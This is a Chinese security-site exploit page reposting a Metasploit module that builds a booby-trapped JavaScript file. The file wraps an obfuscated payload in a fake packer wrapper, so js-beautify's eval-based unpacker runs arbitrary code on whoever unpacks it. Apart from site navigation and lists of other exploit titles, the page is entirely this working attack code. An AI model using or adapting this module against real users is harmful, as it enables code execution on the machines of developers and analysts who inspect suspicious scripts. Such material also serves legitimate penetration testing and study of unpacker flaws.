首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Javascript Injection For Eval-Based Unpackers
来源:metasploit.com 作者:joev 发布时间:2015-02-25  
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/exploit/jsobfu'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::JSObfu

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Javascript Injection for Eval-based Unpackers',
      'Description'    => %q{
        This module generates a Javascript file that executes arbitrary code
        when an eval-based unpacker is run on it. Works against js-beautify's
        P_A_C_K_E_R unpacker.
      },
      'Author'         => [ 'joev' ],
      'License'        => MSF_LICENSE,
      'References'  =>
        [
        ],
      'Platform'       => 'nodejs',
      'Arch'           => ARCH_NODEJS,
      'Privileged'     => false,
      'Targets'        =>	[['Automatic', {}]],
      'DisclosureDate' => 'Feb 18 2015',
      'DefaultTarget'  => 0))

    register_options([
      OptString.new('FILENAME', [true, 'The file name.', 'msf.js']),
      OptString.new('CUSTOM_JS', [false, 'Custom Javascript payload.'])
    ], self.class)
  end

  def exploit
    p = js_obfuscate(datastore['CUSTOM_JS'] || payload.encoded);
    print_status("Creating '#{datastore['FILENAME']}' file...")
    file_create("eval(function(p,a,c,k,e,r){}((function(){ #{p} })(),''.split('|'),0,{}))")
  end

end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·HP Client Automation Command I
·PHP DateTimeZone Type Confusio
·PCMan FTP Server 2.0.7 - Buffe
·Samsung iPolis Buffer Overflow
·Realtek 11n Wireless LAN utili
·WeBid 1.1.1 Unrestricted File
·WordPress Webdorado Spider Eve
·Zabbix 2.0.5 Password Disclosu
·PHP DateTime Use After Free Vu
·WordPress Admin Shell Upload
·SEANux 1.0 Remote Command Exec
·WordPress Holding Pattern Them
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved